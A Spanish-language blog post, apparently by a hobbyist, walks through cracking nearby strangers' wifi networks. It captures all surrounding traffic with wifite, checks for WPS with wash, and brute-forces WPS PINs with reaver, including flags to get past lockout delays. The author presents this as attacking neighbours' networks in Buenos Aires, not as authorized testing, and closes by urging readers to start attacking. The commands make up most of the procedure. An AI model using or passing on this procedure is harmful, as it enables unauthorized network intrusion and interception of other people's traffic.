Hace unos días estuve publicando en mis historiales de INSTAGRAM sobre lo que estaba haciendo en las redes y al final lograba acceder a una con algunos métodos que había escrito.

Muchas de las personas que me enviaban mensajes para ayudarme sobre los problemas y las frustraciones que vivía con las redes que escaneaba, llegue a una conclusión que la mayoría de la gente no había leído algunos post que había publicado.

Siempre cuando busco redes en Buenos Aires me encuentro con puras WPA2 pero aveces los usuarios no desactivan la WPS, es lo primero que observo. Si en caso de ser una WEP, facil y rápido uso fern-wifi-cracker.

LINK: WPSVIDEO

LINK: WPA2FUERZA BRUTA

IMPORTANTE

Bueno con esos post siempre he utilizado y me han funcionado, ahora vamos a ver una auditoría en las redes sociales y comprobar el tipo de seguridad. Quiero aclarar que utilizar DEBIAN, las herramientas en los repositorios están des-actualizada, como por ejemplo reaver estaba con la versión antigua y KALI LINUX tiene otro tipo de versión, tuve que agregar los repo de kali linux.

PROCEDIMIENTO:

Vamos a seguir lo siguientes paso para intentar descargar todo el trafico de nuestras redes que se encuentran cerca.

sudo airmon-ng start wlan1

Para nuestra interfaz de wlan1 paso a wlan1mon. Ahora vamos a usar WIFITE

sudo wifite -i wlan1mon

Comenzará el proceso y le vamos a ordenar que capture el trafico.

Obviamente usando wifite podes seleccionar la red que quieras pero en mi caso he utilizado toda. Ahora toda esa información esta en /home/hs.

Esta guardado con cada nombre y mac de cada red, ahora vamos abrir uno con wireshark.
Ahora si vistes el video de como obtener claves WPS ahora vas a ver como confirmar que es una WPS oficial.
Cuando abren el .cap obviamente la primera es información del router y los demás son los usuarios conectado.
Nos vamos a IEEE 802.11 wireless LAN

sudo wireshark


Si quieres ver otras redes podes ver el tipo de seguridad que tiene para intentar crear un diccionario para una fuerza bruta.
Ahora en caso de jugar con algunas WPS.
Crear un script

sudo nano redes.sh
ifconfig wlan1 down
iwconfig wlan1 mode monitor
ifconfig wlan1 up
iwconfig wlan1 |grep Mode

Ahora podemos usar airmon-ng

sudo airmon-ng start wlan1

No te olvides de matar los procesos

sudo kill 1234
sudo airodump-ng wlan1

Eso te permite para saber que tipo de red puedes atacar, mayor de 80 PWR no podes acabar por la distancia. Menos si.
Ahora comprobamos si es una WPS

sudo wash -i wlan1

EN caso de aparecer Yes Lck significa que estará bloqueada y no pierdas tiempo en atacarla porque no lograrás.
Ahora podes usar REAVER o penetrator

sudo reaver -b MAC -i wlan1 -c x -vv

En caso de ser bloqueado por 60 segundos.

sudo reaver -i wlan1 -b MAC -r 2:60
sudo reaver -i wlan1 -c 8 -b MAC -vv --no-nacks -r 2:60

Listo! ahora si ponete a jugar y comenzar atacar, recuerda que esto lleva 3 días o más como lo he demostrado en mis historiales de instagram.
No te olvides en compartirlo! Gracias

Share Please!